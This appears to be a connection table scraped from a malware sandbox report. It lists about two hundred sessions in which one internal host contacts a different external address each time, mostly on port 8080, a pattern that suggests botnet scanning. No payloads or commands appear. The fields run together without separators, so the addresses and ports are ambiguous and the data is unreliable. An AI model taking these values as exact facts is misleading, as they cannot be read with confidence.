                                                        16988192.168.2.2343144108.213.13.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16989192.168.2.2350974142.36.252.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16990192.168.2.2341586164.139.105.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16991192.168.2.2359332126.15.49.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16992192.168.2.234970664.179.39.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16993192.168.2.235426046.15.30.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16994192.168.2.2343518199.114.102.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16995192.168.2.2354506125.93.101.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16996192.168.2.234620683.220.107.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16997192.168.2.236006474.12.111.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16998192.168.2.2348100142.175.64.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16999192.168.2.2336466161.128.30.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17000192.168.2.2338948133.197.149.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17001192.168.2.2356730195.16.243.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17002192.168.2.235481454.102.85.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17003192.168.2.2352384174.59.157.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17004192.168.2.2339852201.71.253.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17005192.168.2.2344422180.28.116.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17006192.168.2.234050889.20.224.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17007192.168.2.2353824222.46.91.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17008192.168.2.2353850176.59.143.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17009192.168.2.2338056189.246.92.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17010192.168.2.234593223.0.240.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17011192.168.2.234076865.180.133.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17012192.168.2.2358252193.87.147.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17013192.168.2.235852057.251.44.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17014192.168.2.23447844.222.84.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17015192.168.2.234489287.22.200.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17016192.168.2.2356284197.52.8.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17017192.168.2.234105447.160.56.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17018192.168.2.235580884.242.69.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17019192.168.2.235207466.200.153.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17020192.168.2.233990837.218.55.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17021192.168.2.235352238.247.99.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17022192.168.2.2341760196.166.223.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17023192.168.2.2351578101.14.183.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17024192.168.2.2355172184.208.89.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17025192.168.2.2343662170.235.48.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17026192.168.2.2359794151.167.239.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17027192.168.2.2335284177.7.163.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17028192.168.2.2334188208.147.44.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17029192.168.2.2359620174.133.44.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17030192.168.2.234001431.227.224.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17031192.168.2.234680418.20.124.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17032192.168.2.2358230220.214.74.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17033192.168.2.235201488.69.126.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17034192.168.2.2346768126.39.148.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17035192.168.2.234162249.212.42.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17036192.168.2.2353238156.225.234.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17037192.168.2.235681852.160.246.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17038192.168.2.233656045.160.100.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17039192.168.2.2333606153.159.36.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17040192.168.2.2358046131.62.212.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17041192.168.2.2336450204.26.58.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17042192.168.2.235337084.173.84.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17043192.168.2.2345920193.146.208.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17044192.168.2.234429852.189.123.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17045192.168.2.235058285.83.195.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17046192.168.2.2353396185.188.24.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17047192.168.2.235985619.212.244.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17048192.168.2.2349572140.3.188.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17049192.168.2.2359816118.172.41.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17050192.168.2.2339834185.139.144.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17051192.168.2.23533844.30.61.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17052192.168.2.233752019.210.20.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17053192.168.2.2333990209.35.196.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17054192.168.2.2358512110.32.43.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17055192.168.2.2355884180.54.129.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17056192.168.2.234331469.52.7.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17057192.168.2.235984870.127.4.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17058192.168.2.2344248118.138.2.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17059192.168.2.2355992122.217.252.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17060192.168.2.2337006118.72.186.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17061192.168.2.233972273.217.205.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17062192.168.2.2343934174.91.17.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17063192.168.2.2343166146.83.7.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17064192.168.2.235202246.2.232.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17065192.168.2.2346270198.88.213.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17066192.168.2.2353074166.179.129.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17067192.168.2.235106895.13.19.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17068192.168.2.233976683.46.44.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17069192.168.2.234171058.47.11.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17070192.168.2.235546891.186.187.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17071192.168.2.2358710130.67.187.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17072192.168.2.23527101.74.150.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17073192.168.2.2351998200.129.149.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17074192.168.2.233611859.137.10.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17075192.168.2.235589846.119.150.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17076192.168.2.2339042207.63.253.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17077192.168.2.2341210105.114.66.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17078192.168.2.2343454168.48.43.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17079192.168.2.233396241.25.207.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17080192.168.2.2360284191.148.129.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17081192.168.2.2358236162.44.88.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17082192.168.2.2337334216.51.142.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17083192.168.2.2357952173.169.155.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17084192.168.2.2337958181.158.204.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17085192.168.2.2359980164.169.244.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17086192.168.2.234083048.63.24.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17087192.168.2.2359252201.134.125.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17088192.168.2.2355540108.12.93.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17089192.168.2.236077053.192.205.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17090192.168.2.2342806118.181.74.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17091192.168.2.2334870175.10.179.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17092192.168.2.2355432153.57.66.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17093192.168.2.234928672.137.164.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17094192.168.2.2354954161.249.136.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17095192.168.2.2340350183.160.82.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17096192.168.2.233971445.92.61.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17097192.168.2.235859876.209.55.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17098192.168.2.2353396188.238.58.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17099192.168.2.234161464.83.195.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17100192.168.2.235163884.211.36.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17101192.168.2.2350036105.255.49.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17102192.168.2.233725060.96.31.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17103192.168.2.2344362141.62.175.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17104192.168.2.2336592177.43.243.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17105192.168.2.233417072.224.203.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17106192.168.2.2343246203.130.87.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17107192.168.2.233620873.222.203.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17108192.168.2.2334320143.125.53.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17109192.168.2.23347488.40.112.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17110192.168.2.2337020142.103.134.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17111192.168.2.2350762139.171.160.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17112192.168.2.2341596141.35.18.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17113192.168.2.2345062179.126.141.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17114192.168.2.234432451.152.28.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17115192.168.2.235166659.6.76.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17116192.168.2.234355887.138.145.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17117192.168.2.233459485.151.161.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17118192.168.2.235174457.144.231.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17119192.168.2.234702459.5.243.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17120192.168.2.2347212129.209.31.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17121192.168.2.2343350125.58.6.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17122192.168.2.2349674167.211.122.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17123192.168.2.2345086219.158.128.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17124192.168.2.2355760126.253.21.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17125192.168.2.233940613.186.159.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17126192.168.2.2337816147.35.64.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17127192.168.2.2339360196.135.14.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17128192.168.2.2356592150.21.210.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17129192.168.2.235006878.230.148.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17130192.168.2.233437069.252.244.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17131192.168.2.2356786151.106.166.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17132192.168.2.236083236.105.148.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17133192.168.2.2346212130.227.219.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17134192.168.2.2335346134.231.63.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17135192.168.2.2346782173.243.218.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17136192.168.2.234246414.19.163.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17137192.168.2.2348260143.95.138.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17138192.168.2.2360186202.184.144.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17139192.168.2.234657643.181.77.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17140192.168.2.235886051.255.55.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17141192.168.2.2357522223.142.150.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17142192.168.2.2340678138.174.222.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17143192.168.2.235966063.25.218.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17144192.168.2.2351646145.218.218.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17145192.168.2.2352528158.93.200.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17146192.168.2.23525141.152.220.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17147192.168.2.235839058.98.117.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17148192.168.2.2342262153.37.248.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17149192.168.2.2352986193.201.29.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17150192.168.2.2345764182.116.178.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17151192.168.2.2343608144.110.221.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17152192.168.2.2335702119.0.147.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17153192.168.2.2357220144.44.239.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17154192.168.2.235759470.35.117.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17155192.168.2.234763248.249.140.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17156192.168.2.2336446190.217.200.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17157192.168.2.2339986181.96.227.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17158192.168.2.2351564113.114.148.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17159192.168.2.2347034173.31.98.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17160192.168.2.234130686.164.60.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17161192.168.2.235787272.244.76.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17162192.168.2.2334380195.102.150.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17163192.168.2.2339958124.101.182.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17164192.168.2.235853447.176.105.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17165192.168.2.234529276.232.2.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17166192.168.2.2349792187.73.131.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17167192.168.2.233993231.120.203.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17168192.168.2.235845469.11.4.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17169192.168.2.2342396148.163.188.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17170192.168.2.2356428179.59.22.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17171192.168.2.2333936183.148.161.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17172192.168.2.235649457.255.35.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17173192.168.2.2342878157.255.144.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17174192.168.2.2358728106.99.253.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17175192.168.2.2350978141.82.187.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17176192.168.2.2359928107.176.148.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17177192.168.2.234946646.238.187.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17178192.168.2.2341798216.108.219.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17179192.168.2.2339150188.103.244.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17180192.168.2.2353146159.14.166.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17181192.168.2.235252870.52.72.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17182192.168.2.234699454.218.187.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17183192.168.2.2355208161.165.0.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17184192.168.2.235536451.60.89.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17185192.168.2.2354522140.34.246.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17186192.168.2.2334488167.89.247.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17187192.168.2.2350748161.224.47.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17188192.168.2.233360057.174.226.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17189192.168.2.2349988142.63.36.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17190192.168.2.235887488.28.180.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17191192.168.2.2345444195.66.29.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192192.168.2.235907661.39.233.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17193192.168.2.2332820208.178.158.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17194192.168.2.2359788114.58.222.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17195192.168.2.2355424132.210.198.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17196192.168.2.233907070.21.141.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17197192.168.2.2353104188.36.7.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17198192.168.2.235339039.227.99.28080
                                                        TimestampBytes transferredDirectionData


